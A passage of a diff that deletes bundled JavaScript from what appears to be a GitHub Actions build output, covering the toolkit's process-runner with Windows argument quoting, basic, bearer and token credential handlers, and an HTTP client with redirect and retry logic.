${a}`; - } - } - // Windows + verbatim - else if (options.windowsVerbatimArguments) { - cmd += `"${toolPath}"`; - for (const a of args) { - cmd += ` ${a}`; - } - } - // Windows (regular) - else { - cmd += this._windowsQuoteCmdArg(toolPath); - for (const a of args) { - cmd += ` ${this._windowsQuoteCmdArg(a)}`; - } - } - } - else { - // OSX/Linux - this can likely be improved with some form of quoting. - // creating processes on Unix is fundamentally different than Windows. - // on Unix, execvp() takes an arg array. - cmd += toolPath; - for (const a of args) { - cmd += ` ${a}`; - } - } - return cmd; - } - _processLineBuffer(data, strBuffer, onLine) { - try { - let s = strBuffer + data.toString(); - let n = s.indexOf(os.EOL); - while (n > -1) { - const line = s.substring(0, n); - onLine(line); - // the rest of the string ... - s = s.substring(n + os.EOL.length); - n = s.indexOf(os.EOL); - } - return s; - } - catch (err) { - // streaming lines to console is best effort. Don't fail a build. - this._debug(`error processing line. Failed with error ${err}`); - return ''; - } - } - _getSpawnFileName() { - if (IS_WINDOWS) { - if (this._isCmdFile()) { - return process.env['COMSPEC'] || 'cmd.exe'; - } - } - return this.toolPath; - } - _getSpawnArgs(options) { - if (IS_WINDOWS) { - if (this._isCmdFile()) { - let argline = `/D /S /C "${this._windowsQuoteCmdArg(this.toolPath)}`; - for (const a of this.args) { - argline += ' '; - argline += options.windowsVerbatimArguments - ? a - : this._windowsQuoteCmdArg(a); - } - argline += '"'; - return [argline]; - } - } - return this.args; - } - _endsWith(str, end) { - return str.endsWith(end); - } - _isCmdFile() { - const upperToolPath = this.toolPath.toUpperCase(); - return (this._endsWith(upperToolPath, '.CMD') || - this._endsWith(upperToolPath, '.BAT')); - } - _windowsQuoteCmdArg(arg) { - // for .exe, apply the normal quoting rules that libuv applies - if (!this._isCmdFile()) { - return this._uvQuoteCmdArg(arg); - } - // otherwise apply quoting rules specific to the cmd.exe command line parser. - // the libuv rules are generic and are not designed specifically for cmd.exe - // command line parser. - // - // for a detailed description of the cmd.exe command line parser, refer to - // http://stackoverflow.com/questions/4094699/how-does-the-windows-command-interpreter-cmd-exe-parse-scripts/7970912#7970912 - // need quotes for empty arg - if (!arg) { - return '""'; - } - // determine whether the arg needs to be quoted - const cmdSpecialChars = [ - ' ', - '\t', - '&', - '(', - ')', - '[', - ']', - '{', - '}', - '^', - '=', - ';', - '!', - "'", - '+', - ',', - '`', - '~', - '|', - '<', - '>', - '"' - ]; - let needsQuotes = false; - for (const char of arg) { - if (cmdSpecialChars.some(x => x === char)) { - needsQuotes = true; - break; - } - } - // short-circuit if quotes not needed - if (!needsQuotes) { - return arg; - } - // the following quoting rules are very similar to the rules that by libuv applies. - // - // 1) wrap the string in quotes - // - // 2) double-up quotes - i.e. " => "" - // - // this is different from the libuv quoting rules. libuv replaces " with \", which unfortunately - // doesn't work well with a cmd.exe command line. - // - // note, replacing " with "" also works well if the arg is passed to a downstream .NET console app. - // for example, the command line: - // foo.exe "myarg:""my val""" - // is parsed by a .NET console app into an arg array: - // [ "myarg:\"my val\"" ] - // which is the same end result when applying libuv quoting rules. although the actual - // command line from libuv quoting rules would look like: - // foo.exe "myarg:\"my val\"" - // - // 3) double-up slashes that precede a quote, - // e.g. hello \world => "hello \world" - // hello\"world => "hello\\""world" - // hello\\"world => "hello\\\\""world" - // hello world\ => "hello world\\" - // - // technically this is not required for a cmd.exe command line, or the batch argument parser. - // the reasons for including this as a .cmd quoting rule are: - // - // a) this is optimized for the scenario where the argument is passed from the .cmd file to an - // external program. many programs (e.g. .NET console apps) rely on the slash-doubling rule. - // - // b) it's what we've been doing previously (by deferring to node default behavior) and we - // haven't heard any complaints about that aspect. - // - // note, a weakness of the quoting rules chosen here, is that % is not escaped. in fact, % cannot be - // escaped when used on the command line directly - even though within a .cmd file % can be escaped - // by using %%. - // - // the saving grace is, on the command line, %var% is left as-is if var is not defined. this contrasts - // the line parsing rules within a .cmd file, where if var is not defined it is replaced with nothing. - // - // one option that was explored was replacing % with ^% - i.e. %var% => ^%var^%. this hack would - // often work, since it is unlikely that var^ would exist, and the ^ character is removed when the - // variable is used. the problem, however, is that ^ is not removed when %* is used to pass the args - // to an external program. - // - // an unexplored potential solution for the % escaping problem, is to create a wrapper .cmd file. - // % can be escaped within a .cmd file. - let reverse = '"'; - let quoteHit = true; - for (let i = arg.length; i > 0; i--) { - // walk the string in reverse - reverse += arg[i - 1]; - if (quoteHit && arg[i - 1] === '\\') { - reverse += '\\'; // double the slash - } - else if (arg[i - 1] === '"') { - quoteHit = true; - reverse += '"'; // double the quote - } - else { - quoteHit = false; - } - } - reverse += '"'; - return reverse - .split('') - .reverse() - .join(''); - } - _uvQuoteCmdArg(arg) { - // Tool runner wraps child_process.spawn() and needs to apply the same quoting as - // Node in certain cases where the undocumented spawn option windowsVerbatimArguments - // is used. - // - // Since this function is a port of quote_cmd_arg from Node 4.x (technically, lib UV, - // see https://github.com/nodejs/node/blob/v4.x/deps/uv/src/win/process.c for details), - // pasting copyright notice from Node within this function: - // - // Copyright Joyent, Inc. and other Node contributors. All rights reserved. - // - // Permission is hereby granted, free of charge, to any person obtaining a copy - // of this software and associated documentation files (the "Software"), to - // deal in the Software without restriction, including without limitation the - // rights to use, copy, modify, merge, publish, distribute, sublicense, and/or - // sell copies of the Software, and to permit persons to whom the Software is - // furnished to do so, subject to the following conditions: - // - // The above copyright notice and this permission notice shall be included in - // all copies or substantial portions of the Software. - // - // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING - // FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS - // IN THE SOFTWARE. - if (!arg) { - // Need double quotation for empty argument - return '""'; - } - if (!arg.includes(' ') && !arg.includes('\t') && !arg.includes('"')) { - // No quotation needed - return arg; - } - if (!arg.includes('"') && !arg.includes('\\')) { - // No embedded double quotes or backslashes, so I can just wrap - // quote marks around the whole thing. - return `"${arg}"`; - } - // Expected input/output: - // input : hello"world - // output: "hello\"world" - // input : hello""world - // output: "hello\"\"world" - // input : hello\world - // output: hello\world - // input : hello\\world - // output: hello\\world - // input : hello\"world - // output: "hello\\\"world" - // input : hello\\"world - // output: "hello\\\\\"world" - // input : hello world\ - // output: "hello world\\" - note the comment in libuv actually reads "hello world\" - // but it appears the comment is wrong, it should be "hello world\\" - let reverse = '"'; - let quoteHit = true; - for (let i = arg.length; i > 0; i--) { - // walk the string in reverse - reverse += arg[i - 1]; - if (quoteHit && arg[i - 1] === '\\') { - reverse += '\\'; - } - else if (arg[i - 1] === '"') { - quoteHit = true; - reverse += '\\'; - } - else { - quoteHit = false; - } - } - reverse += '"'; - return reverse - .split('') - .reverse() - .join(''); - } - _cloneExecOptions(options) { - options = options || {}; - const result = { - cwd: options.cwd || process.cwd(), - env: options.env || process.env, - silent: options.silent || false, - windowsVerbatimArguments: options.windowsVerbatimArguments || false, - failOnStdErr: options.failOnStdErr || false, - ignoreReturnCode: options.ignoreReturnCode || false, - delay: options.delay || 10000 - }; - result.outStream = options.outStream || process.stdout; - result.errStream = options.errStream || process.stderr; - return result; - } - _getSpawnOptions(options, toolPath) { - options = options || {}; - const result = {}; - result.cwd = options.cwd; - result.env = options.env; - result['windowsVerbatimArguments'] = - options.windowsVerbatimArguments || this._isCmdFile(); - if (options.windowsVerbatimArguments) { - result.argv0 = `"${toolPath}"`; - } - return result; - } - /** - * Exec a tool. - * Output will be streamed to the live console. - * Returns promise with return code - * - * @param tool path to tool to exec - * @param options optional exec options. See ExecOptions - * @returns number - */ - exec() { - return __awaiter(this, void 0, void 0, function* () { - // root the tool path if it is unrooted and contains relative pathing - if (!ioUtil.isRooted(this.toolPath) && - (this.toolPath.includes('/') || - (IS_WINDOWS && this.toolPath.includes('\\')))) { - // prefer options.cwd if it is specified, however options.cwd may also need to be rooted - this.toolPath = path.resolve(process.cwd(), this.options.cwd || process.cwd(), this.toolPath); - } - // if the tool is only a file name, then resolve it from the PATH - // otherwise verify it exists (add extension on Windows if necessary) - this.toolPath = yield io.which(this.toolPath, true); - return new Promise((resolve, reject) => __awaiter(this, void 0, void 0, function* () { - this._debug(`exec tool: ${this.toolPath}`); - this._debug('arguments:'); - for (const arg of this.args) { - this._debug(` ${arg}`); - } - const optionsNonNull = this._cloneExecOptions(this.options); - if (!optionsNonNull.silent && optionsNonNull.outStream) { - optionsNonNull.outStream.write(this._getCommandString(optionsNonNull) + os.EOL); - } - const state = new ExecState(optionsNonNull, this.toolPath); - state.on('debug', (message) => { - this._debug(message); - }); - if (this.options.cwd && !(yield ioUtil.exists(this.options.cwd))) { - return reject(new Error(`The cwd: ${this.options.cwd} does not exist!`)); - } - const fileName = this._getSpawnFileName(); - const cp = child.spawn(fileName, this._getSpawnArgs(optionsNonNull), this._getSpawnOptions(this.options, fileName)); - let stdbuffer = ''; - if (cp.stdout) { - cp.stdout.on('data', (data) => { - if (this.options.listeners && this.options.listeners.stdout) { - this.options.listeners.stdout(data); - } - if (!optionsNonNull.silent && optionsNonNull.outStream) { - optionsNonNull.outStream.write(data); - } - stdbuffer = this._processLineBuffer(data, stdbuffer, (line) => { - if (this.options.listeners && this.options.listeners.stdline) { - this.options.listeners.stdline(line); - } - }); - }); - } - let errbuffer = ''; - if (cp.stderr) { - cp.stderr.on('data', (data) => { - state.processStderr = true; - if (this.options.listeners && this.options.listeners.stderr) { - this.options.listeners.stderr(data); - } - if (!optionsNonNull.silent && - optionsNonNull.errStream && - optionsNonNull.outStream) { - const s = optionsNonNull.failOnStdErr - ? optionsNonNull.errStream - : optionsNonNull.outStream; - s.write(data); - } - errbuffer = this._processLineBuffer(data, errbuffer, (line) => { - if (this.options.listeners && this.options.listeners.errline) { - this.options.listeners.errline(line); - } - }); - }); - } - cp.on('error', (err) => { - state.processError = err.message; - state.processExited = true; - state.processClosed = true; - state.CheckComplete(); - }); - cp.on('exit', (code) => { - state.processExitCode = code; - state.processExited = true; - this._debug(`Exit code ${code} received from tool '${this.toolPath}'`); - state.CheckComplete(); - }); - cp.on('close', (code) => { - state.processExitCode = code; - state.processExited = true; - state.processClosed = true; - this._debug(`STDIO streams have closed for tool '${this.toolPath}'`); - state.CheckComplete(); - }); - state.on('done', (error, exitCode) => { - if (stdbuffer.length > 0) { - this.emit('stdline', stdbuffer); - } - if (errbuffer.length > 0) { - this.emit('errline', errbuffer); - } - cp.removeAllListeners(); - if (error) { - reject(error); - } - else { - resolve(exitCode); - } - }); - if (this.options.input) { - if (!cp.stdin) { - throw new Error('child process missing stdin'); - } - cp.stdin.end(this.options.input); - } - })); - }); - } -} -exports.ToolRunner = ToolRunner; -/** - * Convert an arg string to an array of args. Handles escaping - * - * @param argString string of arguments - * @returns string[] array of arguments - */ -function argStringToArray(argString) { - const args = []; - let inQuotes = false; - let escaped = false; - let arg = ''; - function append(c) { - // we only escape double quotes. - if (escaped && c !== '"') { - arg += '\\'; - } - arg += c; - escaped = false; - } - for (let i = 0; i < argString.length; i++) { - const c = argString.charAt(i); - if (c === '"') { - if (!escaped) { - inQuotes = !inQuotes; - } - else { - append(c); - } - continue; - } - if (c === '\\' && escaped) { - append(c); - continue; - } - if (c === '\\' && inQuotes) { - escaped = true; - continue; - } - if (c === ' ' && !inQuotes) { - if (arg.length > 0) { - args.push(arg); - arg = ''; - } - continue; - } - append(c); - } - if (arg.length > 0) { - args.push(arg.trim()); - } - return args; -} -exports.argStringToArray = argStringToArray; -class ExecState extends events.EventEmitter { - constructor(options, toolPath) { - super(); - this.processClosed = false; // tracks whether the process has exited and stdio is closed - this.processError = ''; - this.processExitCode = 0; - this.processExited = false; // tracks whether the process has exited - this.processStderr = false; // tracks whether stderr was written to - this.delay = 10000; // 10 seconds - this.done = false; - this.timeout = null; - if (!toolPath) { - throw new Error('toolPath must not be empty'); - } - this.options = options; - this.toolPath = toolPath; - if (options.delay) { - this.delay = options.delay; - } - } - CheckComplete() { - if (this.done) { - return; - } - if (this.processClosed) { - this._setResult(); - } - else if (this.processExited) { - this.timeout = timers_1.setTimeout(ExecState.HandleTimeout, this.delay, this); - } - } - _debug(message) { - this.emit('debug', message); - } - _setResult() { - // determine whether there is an error - let error; - if (this.processExited) { - if (this.processError) { - error = new Error(`There was an error when attempting to execute the process '${this.toolPath}'. This may indicate the process failed to start. Error: ${this.processError}`); - } - else if (this.processExitCode !== 0 && !this.options.ignoreReturnCode) { - error = new Error(`The process '${this.toolPath}' failed with exit code ${this.processExitCode}`); - } - else if (this.processStderr && this.options.failOnStdErr) { - error = new Error(`The process '${this.toolPath}' failed because one or more lines were written to the STDERR stream`); - } - } - // clear the timeout - if (this.timeout) { - clearTimeout(this.timeout); - this.timeout = null; - } - this.done = true; - this.emit('done', error, this.processExitCode); - } - static HandleTimeout(state) { - if (state.done) { - return; - } - if (!state.processClosed && state.processExited) { - const message = `The STDIO streams did not close within ${state.delay / - 1000} seconds of the exit event from process '${state.toolPath}'. This may indicate a child process inherited the STDIO streams and has not yet exited.`; - state._debug(message); - } - state._setResult(); - } -} -//# sourceMappingURL=toolrunner.js.map - -/***/ }), - -/***/ 5526: -/***/ (function(__unused_webpack_module, exports) { - -"use strict"; - -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.PersonalAccessTokenCredentialHandler = exports.BearerCredentialHandler = exports.BasicCredentialHandler = void 0; -class BasicCredentialHandler { - constructor(username, password) { - this.username = username; - this.password = password; - } - prepareRequest(options) { - if (!options.headers) { - throw Error('The request has no headers'); - } - options.headers['Authorization'] = `Basic ${Buffer.from(`${this.username}:${this.password}`).toString('base64')}`; - } - // This handler cannot handle 401 - canHandleAuthentication() { - return false; - } - handleAuthentication() { - return __awaiter(this, void 0, void 0, function* () { - throw new Error('not implemented'); - }); - } -} -exports.BasicCredentialHandler = BasicCredentialHandler; -class BearerCredentialHandler { - constructor(token) { - this.token = token; - } - // currently implements pre-authorization - // TODO: support preAuth = false where it hooks on 401 - prepareRequest(options) { - if (!options.headers) { - throw Error('The request has no headers'); - } - options.headers['Authorization'] = `Bearer ${this.token}`; - } - // This handler cannot handle 401 - canHandleAuthentication() { - return false; - } - handleAuthentication() { - return __awaiter(this, void 0, void 0, function* () { - throw new Error('not implemented'); - }); - } -} -exports.BearerCredentialHandler = BearerCredentialHandler; -class PersonalAccessTokenCredentialHandler { - constructor(token) { - this.token = token; - } - // currently implements pre-authorization - // TODO: support preAuth = false where it hooks on 401 - prepareRequest(options) { - if (!options.headers) { - throw Error('The request has no headers'); - } - options.headers['Authorization'] = `Basic ${Buffer.from(`PAT:${this.token}`).toString('base64')}`; - } - // This handler cannot handle 401 - canHandleAuthentication() { - return false; - } - handleAuthentication() { - return __awaiter(this, void 0, void 0, function* () { - throw new Error('not implemented'); - }); - } -} -exports.PersonalAccessTokenCredentialHandler = PersonalAccessTokenCredentialHandler; -//# sourceMappingURL=auth.js.map - -/***/ }), - -/***/ 6255: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -/* eslint-disable @typescript-eslint/no-explicit-any */ -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - var desc = Object.getOwnPropertyDescriptor(m, k); - if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { - desc = { enumerable: true, get: function() { return m[k]; } }; - } - Object.defineProperty(o, k2, desc); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.HttpClient = exports.isHttps = exports.HttpClientResponse = exports.HttpClientError = exports.getProxyUrl = exports.MediaTypes = exports.Headers = exports.HttpCodes = void 0; -const http = __importStar(__nccwpck_require__(3685)); -const https = __importStar(__nccwpck_require__(5687)); -const pm = __importStar(__nccwpck_require__(9835)); -const tunnel = __importStar(__nccwpck_require__(4294)); -const undici_1 = __nccwpck_require__(1773); -var HttpCodes; -(function (HttpCodes) { - HttpCodes[HttpCodes["OK"] = 200] = "OK"; - HttpCodes[HttpCodes["MultipleChoices"] = 300] = "MultipleChoices"; - HttpCodes[HttpCodes["MovedPermanently"] = 301] = "MovedPermanently"; - HttpCodes[HttpCodes["ResourceMoved"] = 302] = "ResourceMoved"; - HttpCodes[HttpCodes["SeeOther"] = 303] = "SeeOther"; - HttpCodes[HttpCodes["NotModified"] = 304] = "NotModified"; - HttpCodes[HttpCodes["UseProxy"] = 305] = "UseProxy"; - HttpCodes[HttpCodes["SwitchProxy"] = 306] = "SwitchProxy"; - HttpCodes[HttpCodes["TemporaryRedirect"] = 307] = "TemporaryRedirect"; - HttpCodes[HttpCodes["PermanentRedirect"] = 308] = "PermanentRedirect"; - HttpCodes[HttpCodes["BadRequest"] = 400] = "BadRequest"; - HttpCodes[HttpCodes["Unauthorized"] = 401] = "Unauthorized"; - HttpCodes[HttpCodes["PaymentRequired"] = 402] = "PaymentRequired"; - HttpCodes[HttpCodes["Forbidden"] = 403] = "Forbidden"; - HttpCodes[HttpCodes["NotFound"] = 404] = "NotFound"; - HttpCodes[HttpCodes["MethodNotAllowed"] = 405] = "MethodNotAllowed"; - HttpCodes[HttpCodes["NotAcceptable"] = 406] = "NotAcceptable"; - HttpCodes[HttpCodes["ProxyAuthenticationRequired"] = 407] = "ProxyAuthenticationRequired"; - HttpCodes[HttpCodes["RequestTimeout"] = 408] = "RequestTimeout"; - HttpCodes[HttpCodes["Conflict"] = 409] = "Conflict"; - HttpCodes[HttpCodes["Gone"] = 410] = "Gone"; - HttpCodes[HttpCodes["TooManyRequests"] = 429] = "TooManyRequests"; - HttpCodes[HttpCodes["InternalServerError"] = 500] = "InternalServerError"; - HttpCodes[HttpCodes["NotImplemented"] = 501] = "NotImplemented"; - HttpCodes[HttpCodes["BadGateway"] = 502] = "BadGateway"; - HttpCodes[HttpCodes["ServiceUnavailable"] = 503] = "ServiceUnavailable"; - HttpCodes[HttpCodes["GatewayTimeout"] = 504] = "GatewayTimeout"; -})(HttpCodes || (exports.HttpCodes = HttpCodes = {})); -var Headers; -(function (Headers) { - Headers["Accept"] = "accept"; - Headers["ContentType"] = "content-type"; -})(Headers || (exports.Headers = Headers = {})); -var MediaTypes; -(function (MediaTypes) { - MediaTypes["ApplicationJson"] = "application/json"; -})(MediaTypes || (exports.MediaTypes = MediaTypes = {})); -/** - * Returns the proxy URL, depending upon the supplied url and proxy environment variables. - * @param serverUrl The server URL where the request will be sent. For example, https://api.github.com - */ -function getProxyUrl(serverUrl) { - const proxyUrl = pm.getProxyUrl(new URL(serverUrl)); - return proxyUrl ? proxyUrl.href : ''; -} -exports.getProxyUrl = getProxyUrl; -const HttpRedirectCodes = [ - HttpCodes.MovedPermanently, - HttpCodes.ResourceMoved, - HttpCodes.SeeOther, - HttpCodes.TemporaryRedirect, - HttpCodes.PermanentRedirect -]; -const HttpResponseRetryCodes = [ - HttpCodes.BadGateway, - HttpCodes.ServiceUnavailable, - HttpCodes.GatewayTimeout -]; -const RetryableHttpVerbs = ['OPTIONS', 'GET', 'DELETE', 'HEAD']; -const ExponentialBackoffCeiling = 10; -const ExponentialBackoffTimeSlice = 5; -class HttpClientError extends Error { - constructor(message, statusCode) { - super(message); - this.name = 'HttpClientError'; - this.statusCode = statusCode; - Object.setPrototypeOf(this, HttpClientError.prototype); - } -} -exports.HttpClientError = HttpClientError; -class HttpClientResponse { - constructor(message) { - this.message = message; - } - readBody() { - return __awaiter(this, void 0, void 0, function* () { - return new Promise((resolve) => __awaiter(this, void 0, void 0, function* () { - let output = Buffer.alloc(0); - this.message.on('data', (chunk) => { - output = Buffer.concat([output, chunk]); - }); - this.message.on('end', () => { - resolve(output.toString()); - }); - })); - }); - } - readBodyBuffer() { - return __awaiter(this, void 0, void 0, function* () { - return new Promise((resolve) => __awaiter(this, void 0, void 0, function* () { - const chunks = []; - this.message.on('data', (chunk) => { - chunks.push(chunk); - }); - this.message.on('end', () => { - resolve(Buffer.concat(chunks)); - }); - })); - }); - } -} -exports.HttpClientResponse = HttpClientResponse; -function isHttps(requestUrl) { - const parsedUrl = new URL(requestUrl); - return parsedUrl.protocol === 'https:'; -} -exports.isHttps = isHttps; -class HttpClient { - constructor(userAgent, handlers, requestOptions) { - this._ignoreSslError = false; - this._allowRedirects = true; - this._allowRedirectDowngrade = false; - this._maxRedirects = 50; - this._allowRetries = false; - this._maxRetries = 1; - this._keepAlive = false; - this._disposed = false; - this.userAgent = userAgent; - this.handlers = handlers || []; - this.requestOptions = requestOptions; - if (requestOptions) { - if (requestOptions.ignoreSslError != null) { - this._ignoreSslError = requestOptions.ignoreSslError; - } - this._socketTimeout = requestOptions.socketTimeout; - if (requestOptions.allowRedirects != null) { - this._allowRedirects = requestOptions.allowRedirects; - } - if (requestOptions.allowRedirectDowngrade != null) { - this._allowRedirectDowngrade = requestOptions.allowRedirectDowngrade; - } - if (requestOptions.maxRedirects != null) { - this._maxRedirects = Math.max(requestOptions.maxRedirects, 0); - } - if (requestOptions.keepAlive != null) { - this._keepAlive = requestOptions.keepAlive; - } - if (requestOptions.allowRetries != null) { - this._allowRetries = requestOptions.allowRetries; - } - if (requestOptions.maxRetries != null) { - this._maxRetries = requestOptions.maxRetries; - } - } - } - options(requestUrl, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('OPTIONS', requestUrl, null, additionalHeaders || {}); - }); - } - get(requestUrl, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('GET', requestUrl, null, additionalHeaders || {}); - }); - } - del(requestUrl, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('DELETE', requestUrl, null, additionalHeaders || {}); - }); - } - post(requestUrl, data, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('POST', requestUrl, data, additionalHeaders || {}); - }); - } - patch(requestUrl, data, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('PATCH', requestUrl, data, additionalHeaders || {}); - }); - } - put(requestUrl, data, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('PUT', requestUrl, data, additionalHeaders || {}); - }); - } - head(requestUrl, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('HEAD', requestUrl, null, additionalHeaders || {}); - }); - } - sendStream(verb, requestUrl, stream, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request(verb, requestUrl, stream, additionalHeaders); - }); - } - /** - * Gets a typed object from an endpoint - * Be aware that not found returns a null. Other errors (4xx, 5xx) reject the promise - */ - getJson(requestUrl, additionalHeaders = {}) { - return __awaiter(this, void 0, void 0, function* () { - additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); - const res = yield this.get(requestUrl, additionalHeaders); - return this._processResponse(res, this.requestOptions); - }); - } - postJson(requestUrl, obj, additionalHeaders = {}) { - return __awaiter(this, void 0, void 0, function* () { - const data = JSON.stringify(obj, null, 2); - additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); - additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); - const res = yield this.post(requestUrl, data, additionalHeaders); - return this._processResponse(res, this.requestOptions); - }); - } - putJson(requestUrl, obj, additionalHeaders = {}) { - return __awaiter(this, void 0, void 0, function* () { - const data = JSON.stringify(obj, null, 2); - additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); - additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); - const res = yield this.put(requestUrl, data, additionalHeaders); - return this._processResponse(res, this.requestOptions); - }); - } - patchJson(requestUrl, obj, additionalHeaders = {}) { - return __awaiter(this, void 0, void 0, function* () { - const data = JSON.stringify(obj, null, 2); - additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); - additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); - const res = yield this.patch(requestUrl, data, additionalHeaders); - return this._processResponse(res, this.requestOptions); - }); - } - /** - * Makes a raw http request. - * All other methods such as get, post, patch, and request ultimately call this. - * Prefer get, del, post and patch - */ - request(verb, requestUrl, data, headers) { - return __awaiter(this, void 0, void 0, function* () { - if (this._disposed) { - throw new Error('Client has already been disposed.'); - } - const parsedUrl = new URL(requestUrl); - let info = this._prepareRequest(verb, parsedUrl, headers); - // Only perform retries on reads since writes may not be idempotent. - const maxTries = this._allowRetries && RetryableHttpVerbs.includes(verb) - ? this._maxRetries + 1 - : 1; - let numTries = 0; - let response; - do { - response = yield this.requestRaw(info, data); - // Check if it's an authentication challenge - if (response && - response.message && - response.message.statusCode === HttpCodes.Unauthorized) { - let authenticationHandler; - for (const handler of this.handlers) { - if (handler.canHandleAuthentication(response)) { - authenticationHandler = handler; - break; - } - } - if (authenticationHandler) { - return authenticationHandler.handleAuthentication(this, info, data); - } - else { - // We have received an unauthorized response but have no handlers to handle it. - // Let the response return to the caller. - return response; - } - } - let redirectsRemaining = this._maxRedirects; - while (response.message.statusCode && - HttpRedirectCodes.includes(response.message.statusCode) && - this._allowRedirects && - redirectsRemaining > 0) { - const redirectUrl = response.message.headers['location']; - if (!redirectUrl) { - // if there's no location to redirect to, we won't - break; - } - const parsedRedirectUrl = new URL(redirectUrl); - if (parsedUrl.protocol === 'https:' && - parsedUrl.protocol !== parsedRedirectUrl.protocol && - !this._allowRedirectDowngrade) { - throw new Error('Redirect from HTTPS to HTTP protocol. This downgrade is not allowed for security reasons. If you want to allow this behavior, set the allowRedirectDowngrade option to true.'); - } - // we need to finish reading the response before reassigning response - // which will leak the open socket. - yield response.readBody(); - // strip authorization header if redirected to a different hostname - if (parsedRedirectUrl.hostname !== parsedUrl.hostname) { - for (const header in headers) { - // header names are case insensitive - if (header.toLowerCase() === 'authorization') { - delete headers[header]; - } - } - } - // let's make the request with the new redirectUrl - info = this._prepareRequest(verb, parsedRedirectUrl, headers); - response = yield this.requestRaw(info, data); - redirectsRemaining--; - } - if (!response.message.statusCode || - !HttpResponseRetryCodes.includes(response.message.statusCode)) { - // If not a retry code, return immediately instead of retrying - return response; - } - numTries += 1; - if (numTries < maxTries) { - yield response.readBody(); - yield this._performExponentialBackoff(numTries); - } - } while (numTries < maxTries); - return response; - }); - } - /** - * Needs to be called if keepAlive is set to true in request options. - */ - dispose() { - if (this._agent) { - this._agent.destroy(); - } - this._disposed = true; - } - /** - * Raw request. - * @param info - * @param data - */ - requestRaw(info, data) { - return __awaiter(this, void 0, void 0, function* () { - return new Promise((resolve, reject) => { - function callbackForResult(err, res) { - if (err) { - reject(err); - } - else if (!res) { - // If `err` is not passed, then `res` must be passed. - reject(new Error('Unknown error')); - } - else { - resolve(res); - } - } - this.requestRawWithCallback(info, data, callbackForResult); - }); - }); - } - /** - * Raw request with callback. - * @param info - * @param data - * @param onResult - */ - requestRawWithCallback(info, data, onResult) { - if (typeof data === 'string') { - if (!info.options.headers) { - info.options.headers = {}; - } - info.options.headers['Content-Length'] = Buffer.byteLength(data, 'utf8'); - } - let callbackCalled = false; - function handleResult(err, res) { - if (!callbackCalled) { - callbackCalled = true; - onResult(err, res); - } - } - const req = info.httpModule.request(info.options, (msg) => { - const res = new HttpClientResponse(msg); - handleResult(undefined, res); - }); - let socket; - req.on('socket', sock => { - socket = sock; - }); - // If we ever get disconnected, we want the socket to timeout eventually - req.setTimeout(this._socketTimeout || 3 * 60000, () => { - if (socket) { - socket.end(); - } - handleResult(new Error(`Request timeout: ${info.options.path}`)); - }); - req.on('error', function (err) { - // err has statusCode property - // res should have headers - handleResult(err); - }); - if (data && typeof data === 'string') { - req.write(data, 'utf8'); 